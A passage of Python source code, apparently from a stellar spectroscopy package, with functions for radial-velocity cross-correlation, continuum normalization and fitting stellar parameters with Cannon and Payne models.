# Normalize by number of "good" points
cross[:,i] *= np.max(num[:,i])
pnum = (num[:,i]>0)
cross[pnum,i] /= num[pnum,i] # normalize by number of "good" points
# Take sqrt to finish adding errors in quadrature
cross_error[:,i] = np.sqrt(cross_error[:,i])
# normalize
cross_error[:,i] *= np.max(num[:,i])
cross_error[pnum,i] /= num[pnum,i]
# Divide by N for covariance, or divide by variance for correlation.
if covariance is True:
cross[:,i] /= nelements
cross_error[:,i] /= nelements
else:
cross[:,i] /= rmsx[i]*rmsy[i]
cross_error[:,i] /= rmsx[i]*rmsy[i]
# Flatten to 1D if norder=1
if norder==1:
cross = cross.flatten()
cross_error = cross_error.flatten()
if yerr is not None: return cross, cross_error
return cross
def specxcorr(wave=None,tempspec=None,obsspec=None,obserr=None,maxlag=200,errccf=False,prior=None):
"""This measures the radial velocity of a spectrum vs. a template using cross-correlation.
This program measures the cross-correlation shift between
a template spectrum (can be synthetic or observed) and
an observed spectrum (or multiple spectra) on the same
logarithmic wavelength scale.
Parameters
----------
wave : array
The wavelength array.
tempspec :
The template spectrum: normalized and on log-lambda scale.
obsspec : array
The observed spectra: normalized and sampled on tempspec scale.
obserr : array
The observed error; normalized and sampled on tempspec scale.
maxlag : int
The maximum lag or shift to explore.
prior : array, optional
Set a Gaussian prior on the cross-correlation. The first
term is the central position (in pixel shift) and the
second term is the Gaussian sigma (in pixels).
Returns
-------
outstr : numpy structured array
The output structure of the final derived RVs and errors.
auto : array
The auto-correlation function of the template
Examples
--------
.. code-block:: python
out = apxcorr(wave,tempspec,spec,err)
"""
# Not enough inputs
if (wave is None) | (tempspec is None) | (obsspec is None) | (obserr is None):
raise ValueError('Syntax - out = apxcorr(wave,tempspec,spec,err,auto=auto)')
return
nwave = len(wave)
# Are there multiple observed spectra
if obsspec.ndim>1:
nspec = obsspec.shape[1]
else:
nspec = 1
# Set up the cross-correlation parameters
# this only gives +/-450 km/s with 2048 pixels, maybe use larger range
nlag = 2*np.round(np.abs(maxlag))+1
if ((nlag % 2) == 0): nlag +=1 # make sure nlag is odd
dlag = 1
minlag = -np.int(np.ceil(nlag/2))
lag = np.arange(nlag)*dlag+minlag+1
# Initialize the output structure
outstr = np.zeros(1,dtype=xcorr_dtype(nlag))
outstr["xshift"] = np.nan
outstr["xshifterr"] = np.nan
outstr["vrel"] = np.nan
outstr["vrelerr"] = np.nan
outstr["chisq"] = np.nan
wobs = wave.copy()
nw = len(wobs)
spec = obsspec.copy()
err = obserr.copy()
template = tempspec.copy()
# mask bad pixels, set to NAN
sfix = (spec < 0.01)
nsfix = np.sum(sfix)
if nsfix>0: spec[sfix] = np.nan
tfix = (template < 0.01)
ntfix = np.sum(tfix)
if ntfix>0: template[tfix] = np.nan
# set cross-corrlation window to be good range + nlag
#lo = (0 if (gd[0]-nlag)<0 else gd[0]-nlag)
#hi = ((nw-1) if (gd[ngd-1]+nlag)>(nw-1) else gd[ngd-1]+nlag)
nindobs = np.sum(np.isfinite(spec) == True) # only finite values, in case any NAN
nindtemp = np.sum(np.isfinite(template) == True) # only finite values, in case any NAN
if (nindobs>0) & (nindtemp>0):
# Cross-Correlation
#------------------
# Calculate the CCF uncertainties using propagation of errors
# Make median filtered error array
# high error values give crazy values in ccferr
obserr1 = err.copy()
if err.ndim==1:
bderr = ((obserr1 > 1) | (obserr1 <= 0.0))
nbderr = np.sum(bderr)
ngderr = np.sum((bderr==False))
if (nbderr > 0) & (ngderr > 1): obserr1[bderr]=np.median([obserr1[(bderr==False)]])
obserr1 = median_filter(obserr1,51)
if err.ndim==2:
for i in range(obserr1.shape[1]):
oerr1 = obserr1[:,i]
bderr = ((oerr1 > 1) | (oerr1 <= 0.0))
nbderr = np.sum(bderr)
ngderr = np.sum((bderr==False))
if (nbderr > 0) & (ngderr > 1): oerr1[bderr]=np.median([oerr1[(bderr==False)]])
oerr1 = median_filter(oerr1,51)
obserr1[:,i] = oerr1
# Run the cross-correlation
ccf, ccferr = ccorrelate(template,spec,lag,obserr1)
# Apply flat-topped Gaussian prior with unit amplitude
# add a broader Gaussian underneath so the rest of the
# CCF isn't completely lost
if prior is not None:
ccf *= np.exp(-0.5*(((lag-prior[0])/prior[1])**4))*0.8+np.exp(-0.5*(((lag-prior[0])/150)**2))*0.2
else: # no good pixels
ccf = np.float(lag)*0.0
if (errccf is True) | (nofit is False): ccferr=ccf
# Remove the median
ccf -= np.median(ccf)
# Best shift
best_shiftind0 = np.argmax(ccf)
best_xshift0 = lag[best_shiftind0]
#temp = shift( tout, best_xshift0)
temp = np.roll(template, best_xshift0, axis=0)
# Find Chisq for each synthetic spectrum
gdmask = (np.isfinite(spec)==True) & (np.isfinite(temp)==True) & (spec>0.0) & (err>0.0) & (err < 1e5)
ngdpix = np.sum(gdmask)
if (ngdpix==0):
raise Exception('Bad spectrum')
chisq = np.sqrt( np.sum( (spec[gdmask]-temp[gdmask])**2/err[gdmask]**2 )/ngdpix )
outstr["chisq"] = chisq
outstr["ccf"] = ccf
outstr["ccferr"] = ccferr
outstr["ccnlag"] = nlag
outstr["cclag"] = lag
# Remove smooth background at large scales
cont = gaussian_filter1d(ccf,100)
ccf_diff = ccf-cont
# Get peak of CCF
best_shiftind = np.argmax(ccf_diff)
best_xshift = lag[best_shiftind]
# Fit ccf peak with a Gaussian plus a line
#---------------------------------------------
# Some CCF peaks are SOOO wide that they span the whole width
# do the first one without background subtraction
estimates0 = [ccf_diff[best_shiftind0], best_xshift0, 4.0, 0.0]
lbounds0 = [1e-3, np.min(lag), 0.1, -np.inf]
ubounds0 = [np.inf, np.max(lag), np.max(lag), np.inf]
pars0, cov0 = dln.gaussfit(lag,ccf_diff,estimates0,ccferr,bounds=(lbounds0,ubounds0))
perror0 = np.sqrt(np.diag(cov0))
# Fit the width
# keep height, center and constant constrained
estimates1 = pars0
estimates1[1] = best_xshift
lbounds1 = [0.5*estimates1[0], best_xshift-4, 0.3*estimates1[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates1[3]-0.1)) ]
ubounds1 = [1.5*estimates1[0], best_xshift+4, 1.5*estimates1[2], dln.gt(np.max(ccf_diff)*0.5,estimates1[3]+0.1) ]
lo1 = np.int(dln.gt(np.floor(best_shiftind-dln.gt(estimates1[2]*2,5)),0))
hi1 = np.int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates1[2]*2,5)),len(lag)))
pars1, cov1 = dln.gaussfit(lag[lo1:hi1],ccf_diff[lo1:hi1],estimates1,ccferr[lo1:hi1],bounds=(lbounds1,ubounds1))
yfit1 = dln.gaussian(lag[lo1:hi1],*pars1)
perror1 = np.sqrt(np.diag(cov1))
# Fefit and let constant vary more, keep width constrained
estimates2 = pars1
estimates2[1] = dln.limit(estimates2[1],np.min(lag),np.max(lag)) # must be in range
estimates2[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3]
lbounds2 = [0.5*estimates2[0], dln.limit(best_xshift-dln.gt(estimates2[2],1), np.min(lag), estimates2[1]-1),
0.3*estimates2[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates2[3]-0.1)) ]
ubounds2 = [1.5*estimates2[0], dln.limit(best_xshift+dln.gt(estimates2[2],1), estimates2[1]+1, np.max(lag)),
1.5*estimates2[2], dln.gt(np.max(ccf_diff)*0.5,estimates2[3]+0.1) ]
lo2 = np.int(dln.gt(np.floor( best_shiftind-dln.gt(estimates2[2]*2,5)),0))
hi2 = np.int(dln.lt(np.ceil( best_shiftind+dln.gt(estimates2[2]*2,5)),len(lag)))
pars2, cov2 = dln.gaussfit(lag[lo2:hi2],ccf_diff[lo2:hi2],estimates2,ccferr[lo2:hi2],bounds=(lbounds2,ubounds2))
yfit2 = dln.gaussian(lag[lo2:hi2],*pars2)
perror2 = np.sqrt(np.diag(cov2))
# Refit with even narrower range
estimates3 = pars2
estimates3[1] = dln.limit(estimates3[1],np.min(lag),np.max(lag)) # must be in range
estimates3[3] = np.median(ccf_diff[lo1:hi1]-yfit1) + pars1[3]
lbounds3 = [0.5*estimates3[0], dln.limit(best_xshift-dln.gt(estimates3[2],1), np.min(lag), estimates3[1]-1),
0.3*estimates3[2], dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ]
ubounds3 = [1.5*estimates3[0], dln.limit(best_xshift+dln.gt(estimates3[2],1), estimates3[1]+1, np.max(lag)),
1.5*estimates3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ]
lo3 = np.int(dln.gt(np.floor(best_shiftind-dln.gt(estimates3[2]*2,5)),0))
hi3 = np.int(dln.lt(np.ceil(best_shiftind+dln.gt(estimates3[2]*2,5)),len(lag)))
pars3, cov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],estimates3,ccferr[lo3:hi3],bounds=(lbounds3,ubounds3))
yfit3 = dln.gaussian(lag[lo3:hi3],*pars3)
perror3 = np.sqrt(np.diag(cov3))
# This seems to fix high shift/sigma errors
if (perror3[0]>10) | (perror3[1]>10):
dlbounds3 = [0.5*estimates3[0], -10+pars3[1], 0.01, dln.lt(np.min(ccf_diff),dln.lt(0,estimates3[3]-0.1)) ]
dubounds3 = [1.5*estimates3[0], 10+pars3[1], 2*pars3[2], dln.gt(np.max(ccf_diff)*0.5,estimates3[3]+0.1) ]
dpars3, dcov3 = dln.gaussfit(lag[lo3:hi3],ccf_diff[lo3:hi3],pars3,ccferr[lo3:hi3],bounds=(dlbounds3,dubounds3))
dyfit3 = dln.gaussian(lag[lo3:hi3],*pars3)
perror3 = np.sqrt(np.diag(dcov3))
# Final parameters
pars = pars3
perror = perror3
xshift = pars[1]
xshifterr = perror[1]
ccpfwhm_pix = pars[2]*2.35482 # ccp fwhm in pixels
# v = (10^(delta log(wave))-1)*c
dwlog = np.median(dln.slope(np.log10(wave)))
ccpfwhm = ( 10**(ccpfwhm_pix*dwlog)-1 )*cspeed # in km/s
# Convert pixel shift to velocity
#---------------------------------
# delta log(wave) = log(v/c+1)
# v = (10^(delta log(wave))-1)*c
dwlog = np.median(dln.slope(np.log10(wave)))
vrel = ( 10**(xshift*dwlog)-1 )*cspeed
# Vrel uncertainty
dvreldshift = np.log(10.0)*(10**(xshift*dwlog))*dwlog*cspeed # derivative wrt shift
vrelerr = dvreldshift * xshifterr
# Make CCF structure and add to STR
#------------------------------------
outstr["xshift0"] = best_xshift
outstr["ccp0"] = np.max(ccf)
outstr["xshift"] = xshift
outstr["xshifterr"] = xshifterr
#outstr[i].xshift_interp = xshift_interp
outstr["ccpeak"] = pars[0]
outstr["ccpfwhm"] = ccpfwhm # in km/s
outstr["ccp_pars"] = pars
outstr["ccp_perror"] = perror
#outstr[i].ccp_polycoef = polycoef
outstr["vrel"] = vrel
outstr["vrelerr"] = vrelerr
outstr["w0"] = np.min(wave)
outstr["dw"] = dwlog
return outstr
def normspec(spec=None,ncorder=6,fixbadpix=True,noerrcorr=False,
binsize=0.05,perclevel=95.0,growsky=False,nsky=5):
"""
This program normalizes a spectrum.
Parameters
----------
spec : Spec1D object
A spectrum object. This at least needs
to have a FLUX and WAVE attribute.
ncorder : int, default=6
The continuum polynomial order. The default is 6.
noerrcorr : bool, default=False
Do not use a correction for the effects of the errors
on the continuum measurement. The default is to make
this correction if errors are included.
fixbadpix : bool, default=True
Set bad pixels to the continuum
binsize : float, default=0.05
The binsize to use (in units of 900A) for determining
the Nth percentile spectrum to fit with a polynomial.
perclevel : float, default=95
The Nth percentile to use to determine the continuum.
Returns
-------
nspec : array
The continuum normalized spectrum.
cont : array
The continuum array.
masked : array
A boolean array specifying if a pixel was masked (True) or not (False).
Examples
--------
.. code-block:: python
nspec,cont,masked = normspec(spec)
"""
# Not enough inputs
if spec is None:
raise ValueError("""spec2 = normspec(spec,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)""")
musthave = ['flux','err','mask','wave']
for a in musthave:
if hasattr(spec,a) is False:
raise ValueError("spec object must have "+a)
# Can only do 1D or 2D arrays
if spec.flux.ndim>2:
raise Exception("Flux can only be 1D or 2D arrays")
# Do special processing if the input is 2D
# Loop over the shorter axis
if spec.flux.ndim==2:
nx, ny = spec.flux.shape
nspec = np.zeros(spec.flux.shape)
cont = np.zeros(spec.flux.shape)
masked = np.zeros(spec.flux.shape,bool)
if nx<ny:
for i in range(nx):
flux = spec.flux[i,:]
err = spec.err[i,:]
mask = spec.mask[i,:]
wave = spec.wave[i,:]
spec1 = Spec1D(flux)
spec1.err = err
spec1.mask = mask
spec1.wave = wave
nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)
nspec[i,:] = nspec1
cont[i,:] = cont1
masked[i,:] = masked1
else:
for i in range(ny):
flux = spec.flux[:,i]
err = spec.err[:,i]
mask = spec.mask[:,i]
wave = spec.wave[:,i]
spec1 = Spec1D(flux)
spec1.err = err
spec1.mask = mask
spec1.wave = wave
nspec1, cont1, masked1 = normspec(spec1,fixbadpix=fixbadpix,ncorder=ncorder,noerrcorr=noerrcorr,
binsize=binsize,perclevel=perclevel)
nspec[:,i] = nspec1
cont[:,i] = cont1
masked[:,i] = masked1
return (nspec,cont,masked)
# Continuum Normalize
#----------------------
w = spec.wave.copy()
x = (w-np.median(w))/(np.max(w*0.5)-np.min(w*0.5)) # -1 to +1
y = spec.flux.copy()
yerr = None
if hasattr(spec,'err') is True:
if spec.err is not None:
yerr = spec.err.copy()
# Get good pixels, and set bad pixels to NAN
#--------------------------------------------
gdmask = (y>0) # need positive fluxes
ytemp = y.copy()
# Exclude pixels with mask=bad
if hasattr(spec,'mask') is True:
if spec.mask is not None:
mask = spec.mask.copy()
gdmask = (mask == 0)
gdpix = (gdmask == 1)
ngdpix = np.sum(gdpix)
bdpix = (gdmask != 1)
nbdpix = np.sum(bdpix)
if nbdpix>0: ytemp[bdpix]=np.nan # set bad pixels to NAN for now
# First attempt at continuum
#----------------------------
# Bin the data points
xr = [np.nanmin(x),np.nanmax(x)]
bins = np.ceil((xr[1]-xr[0])/binsize)+1
ybin, bin_edges, binnumber = bindata.binned_statistic(x,ytemp,statistic='percentile',
percentile=perclevel,bins=bins,range=None)
xbin = bin_edges[0:-1]+0.5*binsize
gdbin = np.isfinite(ybin)
ngdbin = np.sum(gdbin)
if ngdbin<(ncorder+1):
raise Exception("Not enough good flux points to fit the continuum")
# Fit with robust polynomial
coef1 = dln.poly_fit(xbin[gdbin],ybin[gdbin],ncorder,robust=True)
cont1 = dln.poly(x,coef1)
# Subtract smoothed error from it to remove the effects
# of noise on the continuum measurement
if (yerr is not None) & (noerrcorr is False):
smyerr = dln.medfilt(yerr,151) # first median filter
smyerr = dln.gsmooth(smyerr,100) # Gaussian smoothing
coef_err = dln.poly_fit(x,smyerr,ncorder,robust=True) # fit with robust poly
#poly_err = dln.poly(x,coef_err)
#cont1 -= 2*dln.poly_err # is this right????
med_yerr = np.median(smyerr) # median error
cont1 -= 2*med_yerr
# Second iteration
#-----------------
# This helps remove some residual structure
ytemp2 = ytemp/cont1
ybin2, bin_edges2, binnumber2 = bindata.binned_statistic(x,ytemp2,statistic='percentile',
percentile=perclevel,bins=bins,range=None)
xbin2 = bin_edges2[0:-1]+0.5*binsize
gdbin2 = np.isfinite(ybin2)
ngdbin2 = np.sum(gdbin2)
if ngdbin2<(ncorder+1):
raise Exception("Not enough good flux points to fit the continuum")
# Fit with robust polynomial
coef2 = dln.poly_fit(xbin2[gdbin2],ybin2[gdbin2],ncorder,robust=True)
cont2 = dln.poly(x,coef2)
# Subtract smoothed error again
if (yerr is not None) & (noerrcorr is False):
cont2 -= med_yerr/cont1
# Final continuum
cont = cont1*cont2 # final continuum
# "Fix" bad pixels
if (nbdpix>0) & fixbadpix is True:
y[bdpix] = cont[bdpix]
# Create continuum normalized spectrum
nspec = spec.flux.copy()/cont
# Add "masked" array
masked = np.zeros(spec.flux.shape,bool)
if (fixbadpix is True) & (nbdpix>0):
masked[bdpix] = True
return (nspec,cont,masked)
def spec_resid(pars,wave,flux,err,models,spec):
"""
This helper function calculates the residuals between an observed spectrum and a Cannon model spectrum.
Parameters
----------
pars : array
Input parameters [teff, logg, feh, rv].
wave : array
Wavelength array for observed spectrum.
flux : array
Observed flux array.
err : array
Uncertainties in the observed flux.
models : list of Cannon models
List of Cannon models to use
spec : Spec1D
The observed spectrum. Needed to run cannon.model_spectrum().
Returns
-------
resid : array
Array of residuals between the observed flux array and the Cannon model spectrum.
Example
-------
.. code-block:: python
resid = spec_resid(pars,wave,flux,err,models,spec)
"""
#m = cannon.model_spectrum(models,spec,teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
m = models(teff=pars[0],logg=pars[1],feh=pars[2],rv=pars[3])
if m is None:
return np.repeat(1e30,len(flux))
resid = (flux-m.flux.flatten())/err
return resid
def printpars(pars,parerr=None,names=None,units=None):
"""
Print out the parameters/labels with optionally uncertainties and units.
One parameter per line of output.
Parameters
----------
pars : list or numpy array
List or array of parameter values to print out. The default is
TEFF, LOGG, FE_H and VREL.
parerr : list or numpy array, optional
List or array of parameter uncertainties to print out. No uncertainties
are printed by default.
names : list, optional
List of parameter names. The default is ['Teff','logg','[Fe/H]','Vrel'] if
4 parameters are input or ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel'] if
5 parameteres are input.
units : list, optional
List of parameter units.
Returns
-------
Parameter values are printed to the screen, one parameter per line.
Example
-------
.. code-block:: python
printpars(pars,parerr,names,names)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
npars = len(pars)
if names is None:
if npars==3:
names = ['Teff','logg','[Fe/H]']
units = ['K','','']
if npars==4:
names = ['Teff','logg','[Fe/H]','Vrel']
units = ['K','','','km/s']
if npars==5:
names = ['Teff','logg','[Fe/H]','[alpha/Fe]','Vrel']
units = ['K','','','','km/s']
if units is None:
units = [' ' for l in pars]
for i in range(npars):
if parerr is None:
err = None
else:
err = parerr[i]
if err is not None:
print('%-6s = %8.2f +/- %6.3f %-5s' % (names[i],pars[i],err,units[i]))
else:
print('%-6s = %8.2f %-5s' % (names[i],pars[i],units[i]))
######################### PAYNE PROGRAMS ###########################
def emcee_lnlike_payne(theta, x, y, yerr, sp):
"""
This helper function calculates the log likelihood for fit_mcmc_payne().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnlike : float
The log likelihood value.
"""
mflux = sp.model(x,*theta)
inv_sigma2 = 1.0/yerr**2
return -0.5*(np.sum((y-mflux)**2*inv_sigma2))
def emcee_lnprior_payne(theta, sp):
"""
This helper function calculates the log prior for fit_mcmc_payne().
It's a flat/uniform prior across the stellar parameter space covered by the
Payne model.
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv, etc.].
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnprior : float
The log prior value.
"""
lbounds,ubounds = sp.bounds
nfitparams = len(sp.fitparams)
inside = True
for i in range(nfitparams):
inside &= (theta[i]>=lbounds[i]) & (theta[i]<=ubounds[i])
if inside:
return 0.0
return -np.inf
def emcee_lnprob_payne(theta, x, y, yerr, sp):
"""
This helper function calculates the log probability for fit_mcmc_payne().
Parameters
----------
theta : array
Input parameters [teff, logg, feh, rv, etc.].
x : array
Array of x-values for y. Not really used.
y : array
Observed flux array.
yerr : array
Uncertainties in the observed flux.
sp : PayneSpecFitter
Special class for fitting Payne models to data.
Returns
-------
lnprob : float
The log probability value, which is the sum of the log prior and the
log likelihood.
"""
lp = emcee_lnprior_payne(theta,sp)
if not np.isfinite(lp):
return -np.inf
return lp + emcee_lnlike_payne(theta, x, y, yerr, sp)
def fit_xcorrgrid_payne(spec,model=None,samples=None,verbose=False,maxvel=1000.0):
"""
Fit spectrum using cross-correlation with models sampled in the parameter space.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load all of the Payne
models in the data/ directory and use those.
samples : numpy structured array, optional
Catalog of teff/logg/feh/alphafe parameters to use when sampling the parameter space.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
maxvel : float, optional
The maximum velocity to probe in the cross-correlation. The default is 1000 km/s.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_xcorrgrid_payne(spec)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Check that the samples input has the right columns
if samples is not None:
for n in ['teff','logg','fe_h','alpha_h']:
try:
dum = samples[n]
except:
raise ValueError(n+' not found in input SAMPLES')
# Step 1: Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Step 2: Load and prepare the Cannon models
#-------------------------------------------
if model is None:
model = payne.load_models()
# Prepare if necessary
if model.prepared is False: model.prepare(spec)
# Step 3: put on logarithmic wavelength grid
#-------------------------------------------
wavelog = utils.make_logwave_scale(spec.wave,vel=0.0) # get new wavelength solution
obs = spec.interp(wavelog)
# The LSF information will not be correct if using Gauss-Hermite, it uses a Gaussian approximation
# it's okay because the "model" is prepared for the original spectra (above)
# Step 4: get initial RV using cross-correlation with rough sampling of Teff/logg parameter space
#------------------------------------------------------------------------------------------------
dwlog = np.median(dln.slope(np.log10(wavelog)))
# vrel = ( 10**(xshift*dwlog)-1 )*cspeed
maxlag = np.int(np.ceil(np.log10(1+maxvel/cspeed)/dwlog))
maxlag = np.maximum(maxlag,50)
if samples is None:
teff = [3500.0, 4000.0, 5000.0, 6000.0, 7500.0, 15000.0, 25000.0, 40000.0, 3500.0, 4300.0, 4700.0, 5200.0]
logg = [4.8, 4.8, 4.6, 4.4, 4.0, 4.0, 4.0, 4.0, 0.5, 1.0, 2.0, 3.0]
feh = [-1.5, -0.5, -1.5, -0.5]
alphafe = [0.0, 0.0, 0.3, 0.3]
dt = np.dtype([('teff',float),('logg',float),('feh',float),('alphafe',float)])
samples = np.zeros(len(teff)*len(feh),dtype=dt)
nteff = len(teff)
for i in range(len(feh)):
samples['teff'][i*nteff:(i+1)*nteff] = teff
samples['logg'][i*nteff:(i+1)*nteff] = logg
samples['feh'][i*nteff:(i+1)*nteff] = feh[i]
samples['alphafe'][i*nteff:(i+1)*nteff] = alphafe[i]
outdtype = np.dtype([('xshift',np.float32),('vrel',np.float32),('vrelerr',np.float32),('ccpeak',np.float32),('ccpfwhm',np.float32),
('chisq',np.float32),('teff',np.float32),('logg',np.float32),('feh',np.float32),('alphafe',np.float32)])
outstr = np.zeros(len(samples),dtype=outdtype)
if verbose is True: print(' TEFF LOGG FEH ALPHAFE VREL CCPEAK CHISQ')
for i in range(len(samples)):
inpdict = {'teff':samples['teff'][i],'logg':samples['logg'][i],'fe_h':samples['feh'][i],
'alpha_h':samples['alphafe'][i]+samples['feh'][i],'rv':0.0}
labels = model.mklabels(inpdict)
m = model(labels,wave=wavelog)
outstr1 = specxcorr(m.wave,m.flux,obs.flux,obs.err,maxlag)
#if outstr1['chisq'] > 1000:
# import pdb; pdb.set_trace()
if verbose is True:
print('%7.0f %5.2f %5.2f %5.2f %8.2f %5.2f %5.2f' % (samples['teff'][i],samples['logg'][i],samples['feh'][i],
samples['alphafe'][i],outstr1['vrel'][0],outstr1['ccpeak'][0],
outstr1['chisq'][0]))
for n in ['xshift','vrel','vrelerr','ccpeak','ccpfwhm','chisq']: outstr[n][i] = outstr1[n]
outstr['teff'][i] = samples['teff'][i]
outstr['logg'][i] = samples['logg'][i]
outstr['feh'][i] = samples['feh'][i]
outstr['alphafe'][i] = samples['alphafe'][i]
#import pdb; pdb.set_trace()
# Get best fit
bestind = np.argmin(outstr['chisq'])
beststr = outstr[bestind]
bestlabels = model.mklabels({'teff':beststr['teff'],'logg':beststr['logg'],'fe_h':beststr['feh'],
'alpha_h':beststr['alphafe']+beststr['feh'],'rv':beststr['vrel']})
bestmodel = model(bestlabels)
if verbose is True:
print('Initial RV fit:')
printpars([beststr['teff'],beststr['logg'],beststr['feh'],beststr['alphafe'],beststr['vrel']],
[None,None,None,None,beststr['vrelerr']])
print('chisq = %5.2f' % beststr['chisq'])
return beststr, bestmodel
def make_payne_initlabels(labels):
""" Make initial guesses for Payne labels."""
labels = np.char.array(labels).upper()
# Initializing the labels array
nlabels = len(labels)
initpars = np.zeros(nlabels,float)
initpars[labels=='TEFF'] = 5000.0
initpars[labels=='LOGG'] = 3.5
initpars[labels.endswith('_H')] = 0.0
# Vmicro/Vturb=2.0 km/s by default
initpars[(labels=='VTURB') | (labels=='VMICRO')] = 2.0
# All abundances, VSINI, VMACRO, RV = 0.0
return initpars
def make_payne_bounds(labels,initpars=None):
""" Make upper and lower bounds for Payne labels."""
if initpars is None:
initpars = make_payne_initlabels(labels)
nlabels = len(labels)
lbounds = np.zeros(nlabels,np.float64)
ubounds = np.zeros(nlabels,np.float64)
# Initial guesses and bounds for the fitted parameters
for i,par in enumerate(labels):
if par.upper()=='TEFF':
lbounds[i] = np.maximum(initpars[i]-2000,3000)
ubounds[i] = initpars[i]+2000
if par.upper()=='LOGG':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = np.minimum(initpars[i]+2,5)
if par.upper()=='VTURB':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = initpars[i]+2
if par.upper().endswith('_H'):
lbounds[i] = np.maximum(initpars[i]-0.75,-2.5)
ubounds[i] = np.minimum(initpars[i]+0.75,0.5)
if par.upper()=='FE_H':
lbounds[i] = -2.5
ubounds[i] = 0.5
if par.upper()=='VSINI':
lbounds[i] = np.maximum(initpars[i]-20,0)
ubounds[i] = initpars[i]+50
if par.upper()=='VMACRO':
lbounds[i] = np.maximum(initpars[i]-2,0)
ubounds[i] = initpars[i]+2
if par.upper()=='RV':
lbounds[i] = -1000.0
ubounds[i] = 1000.0
bounds = (lbounds,ubounds)
return bounds
def fit_lsq_payne(spec,model=None,initpar=None,fitparams=None,fixparams={},verbose=False):
"""
Least Squares fitting with forward modeling of the spectrum.
Parameters
----------
spec : Spec1D object
The observed spectrum to match.
model : Payne model, optional
Payne model to use. The default is to load all of the Payne
models in the data/ directory and use those.
initpar : dictionary or array, optional
Initial estimates for parameters. If it is an array, then it is
assumbed that these are for the FITPARAMS parameters. If it is a
dictionary, then the parameters are clear and they do not need to
cover all FITPARAMS parameters. Optional.
fitparams : list of labels, optional
List of Payne parameter/label names to fit. Optional.
The default values are ['TEFF','LOGG','FE_H','ALPHA_H','RV'].
fixparams : dict, optional
Dictionary of parameters to hold fixed.
verbose : bool, optional
Verbose output of the various steps. This is False by default.
Returns
-------
out : numpy structured array
The output structured array of the final derived RVs, stellar parameters and errors.
bmodel : Spec1D object
The best-fitting Payne model spectrum (as Spec1D object).
Example
-------
.. code-block:: python
out, bmodel = fit_lsq_payne(spec,model)
"""
print = utils.getprintfunc() # Get print function to be used locally, allows for easy logging
# Prepare the spectrum
#-----------------------------
# normalize and mask spectrum
if spec.normalized is False:
spec = utils.specprep(spec)
# Load and prepare the Cannon models
#-------------------------------------------
if model is None:
model = payne.load_models()
# Prepare if necessary
if model.prepared is False: model.prepare(spec)
# Fitting parameters
if fitparams is None:
fitparams = ['TEFF','LOGG','FE_H','ALPHA_H','RV']
else:
fitparams = [f.upper() for f in fitparams] # all CAPS
nfitparams = len(fitparams)
nfixparams = len(fixparams)
nallparams = nfitparams+nfixparams
# Get initial estimates
# this does not need to include initial guess for all fitparams
# that's taken care of below
if initpar is not None and isinstance(initpar,dict) is False:
# Array input
# must be the initial parameters for FITPARAMS
if len(initpar)!=len(fitparams):
raise Exception("INITPAR must have same number of elements as FITPARAMS")
initpar = dict(zip(fitparams,initpar)) # make dictionary
# Make initial parameters for all labels
allinitpar = make_payne_initlabels(fitparams)
if initpar is not None:
for name in initpar.keys():
ind, = np.where(np.char.array(fitparams)==name)
if len(ind)>0:
allinitpar[ind[0]] = initpar[name]
# Initialize spectral fitter
sp = payne.PayneSpecFitter(spec,model,fitparams,fixparams,verbose=False)
# Calculate the bounds
bounds = sp.mkbounds(fitparams,allinitpar)
# Use curve_fit
tol = 5e-5 # 5e-4
dx_lim = sp.mkdxlim(fitparams)
lspars, lscov = curve_fit(sp.model,spec.wave.flatten(),spec.flux.flatten(), #dx_lim=dx_lim,
sigma=spec.err.flatten(),p0=allinitpar,bounds=bounds,jac=sp.jac)
#print(sp.nfev,sp.njac)
# If it hits a boundary then the solution won't change much compared to initpar
# setting absolute_sigma=True gives crazy low lsperror values
lsperror = np.sqrt(np.diag(lscov))
if verbose is True:
print('Least Squares RV and stellar parameters:')
printpars(lspars,names=fitparams)
if nfixparams>0:
all_labels = fitparams+list(fixparams.keys())
all_pars = lspars + fixparams.values()
else:
all_labels = fitparams
all_pars = lspars
bestlabels = model.mklabels(dict(zip(all_labels,all_pars)))
lsmodel = model(bestlabels)
lschisq = np.sqrt(np.sum(((spec.flux-lsmodel.flux)/spec.err)**2)/(spec.npix*spec.norder))
if verbose is True: print('chisq = %5.2f' % lschisq)
# Put it into the output structure
dtype = np.dtype([('labels','<U100',nfitparams),('pars',float,nfitparams),('parerr',float,nfitparams),
('parcov',float,(nfitparams,nfitparams)),('chisq',float)])
out = np.zeros(1,dtype=dtype)
out['labels'] = fitparams
out['pars'] = lspars
out['parerr'] = lsperror
out['parcov'] = lscov
out['chisq'] = lschisq
return out, lsmodel
def mcmc_delta_payne(labels):
""" Get MCMC deltas for the walkers."""
delta = np.zeros(len(labels),float)
for i in range(len(labels)):
name = labels[i]
if name=='TEFF':
